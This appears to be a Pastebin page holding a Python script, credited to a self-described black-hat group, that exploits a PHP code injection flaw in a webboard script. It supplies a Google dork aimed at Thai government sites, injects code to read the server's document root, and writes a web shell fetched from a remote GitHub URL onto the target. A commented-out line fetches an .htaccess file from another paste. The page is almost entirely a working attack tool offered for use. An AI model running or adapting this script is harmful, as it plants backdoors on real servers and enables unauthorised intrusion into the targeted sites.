Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/env python
- #-*- coding: utf-8 -*-
- #from bs4 import BeautifulSoup
- import urllib2
- import re
- print('''\033[1;36m
- ___ _ ___ _ _ _
- / __|___ __| |___ |_ _|_ _ (_)___ __| |_(_)___ _ _
- | (__/ _ \/ _` / -_) | || ' \ | / -_) _| _| / _ \ ' \
- \___\___/\__,_\___| |___|_||_|/ \___\__|\__|_\___/_||_|
- |__/ ''')
- print('''\033[1;33m
- =[ Code Injection & Upload Shell Exploit - V1.0 ]
- [+] -- -- =[ Author: Myanmar Noob Hackers ]
- [+] -- -- =[ Greetz : All Myanmar BLack Hats ]
- [+] -- -- =[ Page FB:https://www.facebook.com/official.myanmar.noob.hackers/ ]''')
- print('''
- Usage : [1]http://example.com
- [2]Expoitation
- \033[1;31m----===---===--- Google Dork ---===---===----
- inurl:/webboard/index.php?category= site:go.th''')
- site = raw_input("\033[1;32m\n Target: ")
- site = site.replace('https://', '')
- site = site.replace('http://', '')
- tar_list = site.split('/')
- for tar in tar_list:
- if tar == '':
- tar_list.remove(tar)
- site = '/'.join(tar_list)
- site = 'http://' + site
- url = urllib2.urlopen( str(site) +"/webboard/index.php?category=${@phpinfo()}").read()
- # ' </td><td class="v">/home/%s/domains/%site/public_html/ '
- path = re.findall("DOCUMENT_ROOT(.*)</td></tr>", url)[0]
- path = path.replace(' </td><td class="v">', "")
- raw_input("\033[1;34m \n [+] -- -- =[ Find Document_Root Path => Enter ]" )
- print('''
- \033[1;31m Found : %s'''%path)
- path = raw_input("\033[1;33m \n Add Document_Root Here: ")
- url1 = urllib2.urlopen( str(site) +"/webboard/index.php?category=${@file_put_contents('"+ str(path) +"/fileupload/upload.php',file_get_contents('https://raw.githubusercontent.com/pentest/shell/master/upload.txt'))}")
- print('''
- \033[1;31m[+] -- -- =[ Successfully Shell Uploaded ]\n [+] -- -- =[ Your Shell : %s/fileupload/upload.php ]''')%site
- print("\n")
- #url2 = urllib2.urlopen( str(site) +"/webboard/index.php?category=${@file_put_contents('"+ str(path) +"/fileupload/.htaccess',file_get_contents('https://pastebin.com/raw/fH5h44u5'))}")
- #print('''
- # \033[1;31m[+] -- -- =[ .htaccess file was created ]\n
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement